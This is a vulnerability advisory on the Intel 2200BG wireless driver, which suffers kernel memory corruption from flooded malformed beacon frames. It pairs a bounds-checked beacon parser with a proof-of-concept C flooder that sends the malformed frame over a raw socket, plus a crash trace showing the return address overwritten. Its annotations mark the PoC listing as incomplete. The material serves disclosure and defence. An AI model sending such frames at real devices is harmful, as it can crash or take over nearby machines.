Type packetstorm
Reporter Johnny Cache
Modified 2006-12-21T00:00:00


Title: Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption
Description: The Intel wireless mini-PCI driver shipped with Intel
2200BG cards is vulnerable to a remote race-condition memory
corruption flaw.
Malformed beacon frames can be used to corrupt internal kernel
structures, leading to arbitrary code execution.
The vulnerability is triggered by flooding the wifi card with many
malformed beacon frames.
Frame data is copied over internal kernel structures, so memory
operations end up being performed on attacker-controlled pointer
values, including the return address (EIP).
This vulnerability was found at Intel 2200 driver version
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silva Pinto (Open Communications Security /
bsilva[at]sekure[dot]org) - Initial discovery and PoC
Johnny Cache - help doing a working exploit
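The advisory describes the root cause only in outline: beacon data is copied over kernel structures without the driver checking that each tagged element fits inside the frame it arrived in. Reading the page's beacon template, the SSID element (tag 0x00) declares a length of 0xff while only five bytes of SSID follow it before the next element. The following is an added example, not code from the advisory or from Intel's driver: a bounds-checked beacon parser of the kind a driver (or a monitoring tool) must implement before copying any element body. Both sample frames are constructed here for illustration, with locally administered MAC addresses; the `validate_beacon` and `beacon_ssid_is` functions and all constants are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define MAC_HDR_LEN       24   /* FC, duration, DA, SA, BSSID, seq ctrl */
#define BEACON_FIXED_LEN  12   /* timestamp(8) + interval(2) + capability(2) */
#define MAX_SSID_LEN      32   /* 802.11 limit on the SSID element body */
#define IE_SSID           0x00

enum beacon_status {
    BEACON_OK = 0,
    BEACON_NOT_BEACON,     /* frame control is not management/beacon */
    BEACON_TOO_SHORT,      /* header or fixed fields truncated */
    BEACON_IE_OVERRUN,     /* an element's length byte points past the frame */
    BEACON_SSID_TOO_LONG   /* SSID element longer than the 32-byte limit */
};

/* Validate every tagged element before a single byte of it is copied.
 * 'len' is the frame length without the trailing FCS. On success the SSID
 * is copied to ssid_out (NUL-terminated) when a buffer is supplied. */
enum beacon_status validate_beacon(const uint8_t *frame, size_t len,
                                   char *ssid_out, size_t ssid_out_len)
{
    if (len < MAC_HDR_LEN + BEACON_FIXED_LEN)
        return BEACON_TOO_SHORT;
    /* type 0 (management), subtype 8 (beacon): low FC byte is 0x80 */
    if ((frame[0] & 0xfc) != 0x80)
        return BEACON_NOT_BEACON;

    size_t off = MAC_HDR_LEN + BEACON_FIXED_LEN;
    while (off < len) {
        if (off + 2 > len)              /* tag present, length byte missing */
            return BEACON_IE_OVERRUN;
        uint8_t tag    = frame[off];
        uint8_t ie_len = frame[off + 1];
        if (ie_len > len - off - 2)     /* body would run past the frame */
            return BEACON_IE_OVERRUN;
        if (tag == IE_SSID) {
            if (ie_len > MAX_SSID_LEN)
                return BEACON_SSID_TOO_LONG;
            if (ssid_out && ssid_out_len > ie_len) {
                memcpy(ssid_out, frame + off + 2, ie_len);
                ssid_out[ie_len] = '\0';
            }
        }
        off += 2 + ie_len;              /* cannot exceed len after the check */
    }
    return BEACON_OK;
}

/* Convenience wrapper: validate, then compare the extracted SSID. */
int beacon_ssid_is(const uint8_t *frame, size_t len, const char *expected)
{
    char ssid[MAX_SSID_LEN + 1] = {0};
    if (validate_beacon(frame, len, ssid, sizeof ssid) != BEACON_OK)
        return 0;
    return strcmp(ssid, expected) == 0;
}

/* Constructed sample: SSID element claims 0xff bytes, only "SAUNA" follows. */
const uint8_t kMalformedBeacon[] = {
    0x80, 0x00, 0x00, 0x00,                    /* FC = beacon, duration */
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff,        /* DA: broadcast */
    0x02, 0x00, 0x5e, 0x00, 0x00, 0x01,        /* SA (constructed) */
    0x02, 0x00, 0x5e, 0x00, 0x00, 0x01,        /* BSSID (constructed) */
    0x30, 0x2f,                                /* sequence control */
    0x84, 0x18, 0xa9, 0xf7, 0x00, 0x00, 0x00, 0x00, /* timestamp */
    0x64, 0x00,                                /* beacon interval: 100 TU */
    0x01, 0x04,                                /* capability info */
    0x00, 0xff, 'S', 'A', 'U', 'N', 'A',       /* SSID IE, bogus length */
    0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c /* rates */
};

/* Constructed sample: identical, but the SSID length byte is honest. */
const uint8_t kWellFormedBeacon[] = {
    0x80, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0x02, 0x00, 0x5e, 0x00, 0x00, 0x01,
    0x02, 0x00, 0x5e, 0x00, 0x00, 0x01,
    0x30, 0x2f,
    0x84, 0x18, 0xa9, 0xf7, 0x00, 0x00, 0x00, 0x00,
    0x64, 0x00,
    0x01, 0x04,
    0x00, 0x05, 'S', 'A', 'U', 'N', 'A',       /* SSID IE, length 5 */
    0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c
};

int main(void)
{
    printf("malformed  -> status %d\n",
           validate_beacon(kMalformedBeacon, sizeof kMalformedBeacon, NULL, 0));
    printf("well-formed -> status %d, ssid ok=%d\n",
           validate_beacon(kWellFormedBeacon, sizeof kWellFormedBeacon, NULL, 0),
           beacon_ssid_is(kWellFormedBeacon, sizeof kWellFormedBeacon, "SAUNA"));
    return 0;
}
```

The check that matters is `ie_len > len - off - 2`, performed before the element body is touched: a driver that instead trusts the length byte and copies 255 bytes into a 32-byte SSID field (or advances its cursor past the end of the receive buffer) is exactly the class of defect the advisory describes. The parser also rejects a frame that was cut off in the middle of an element, which is the case a flood of truncated or oversized beacons exercises.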
Proof Of Concept:

```c
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <linux/wireless.h>

// Change BSSID and SRC MAC ADDR to the AP you are associated with
char beacon[] = { 0x80, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,
0x00, 0x18, 0x39, 0xe2, 0x12, 0xda, 0x00, 0x18, 0x39, 0xe2, 0x12, 0xda,
0x30, 0x2f, 0x84, 0x18, 0xa9, 0xf7, 0x00, 0x00, 0x00, 0x00, 0x64, 0x00,
0x01, 0x04, 0x00, 0xff, 0x53, 0x41, 0x55, 0x4e, 0x41, 0x01, 0x08, 0x82,
0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, 0x04, 0x01, 0x08, 0x05, 0x04,
0x00, 0x01, 0x00, 0x00, 0x2a, 0x01, 0x04, 0x2f, 0x01, 0x04, 0x32, 0x04,
0x0c, 0x12, 0x18, 0x60, 0xdd, 0x06, 0x00, 0x10, 0x18, 0x02, 0x00, 0xf4,
0x08, 0xc1, 0xca, 0x93 };

int main() {
    struct sockaddr_ll link;
    struct ifreq iface;
    int s, i, randd = 0x22, j, m, a, b;
    unsigned long len = 0, c = 0;
    char s_1[700+sizeof(beacon)];

    /* As published, iface.ifr_name is never set before the ioctl() calls
       below; the listing is truncated at that point. */
    if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
        return 0;
    if(ioctl(s,SIOCGIFHWADDR, &iface)) {
        return 0;
    }
    if(ioctl(s,SIOCGIFINDEX, &iface)) {
        return -1;
    }
    if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
        return -1;
    }
    link.sll_family = AF_PACKET;
    link.sll_ifindex = iface.ifr_ifindex;
    if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
        return -1;
    }
    randd = 0x44;
    /* The code that fills s_1 from beacon[] and initialises i is missing
       from the published listing; i is used uninitialised here. */
    s_1[37+i] = 0x44;
    for(;;) {
        i = 147;
        /* overwrite the tagged-parameter region with a rolling byte pattern */
        for(j=0;j<i;j++) {
            if(randd == 0xff)
                randd = 0x00;
            s_1[70+j] = randd++;
        }
        randd = 0x44;
        for(m=0;m<5;m++) {
            /* note: strlen() stops at the first 0x00 byte of beacon[]
               (offset 2), so the sent length is driven by j, not the template */
            len = sendto(s,s_1,strlen(beacon)+j, 0, NULL, 0);
            printf("Sent %lu\n",len);
        }
    }
    return 0;
}
```
Debugging Information:

```
BugCheck D1, {402, 2, 0, f6806422}
*** ERROR: Module load completed but symbols could not be loaded for
Probably caused by : w29n51.sys ( w29n51+4e422 )
Followup: MachineOwner
kd> kv
ChildEBP RetAddr Args to Child
f7a92e68 f6806422 badb0d00 ffffffd2 00000000 nt!KiTrap0E+0x233 (FPO: [0,0]
TrapFrame @ f7a92e68)
WARNING: Stack unwind information not available. Following frames may be
f7a92f24 5b5a5958 00000378 ffffffd2 015dcf64 w29n51+0x4e422
f7a92f4c f67f56b5 8659feb0 01010077 00000000 0x5b5a5958
f7a92f64 f67f2f09 8659f000 f7a92f94 f67de759 w29n51+0x3d6b5
f7a92f70 f67de759 8659f000 4001000d 4001000d w29n51+0x3af09
f7a92f94 f67cf873 86dc8568 86dc6888 00000000 w29n51+0x26759
f7a92fa8 f67b938c 86dc6888 86bd1000 f7a92fd0 w29n51+0x17873
f7a92fb8 f74aaf09 86bd1000 448a47c0 00000001 w29n51+0x138c
f7a92fd0 804dbbd4 86dc8580 86dc856c 00000000 NDIS!ndisMDpcX+0x21 (FPO:
f7a92ff4 804db89e f1751d54 00000000 00000000 nt!KiRetireDpcList+0x46 (FPO:
f7a92ff8 f1751d54 00000000 00000000 00000000 nt!KiDispatchInterrupt+0x2a
(FPO: [Uses EBP] [0,0,1])
804db89e 00000000 00000009 bb835675 00000128 0xf1751d54
```

The return address was overwritten with 0x5b5a5958, i.e. the bytes "XYZ[" from the rolling pattern the PoC writes into the frame.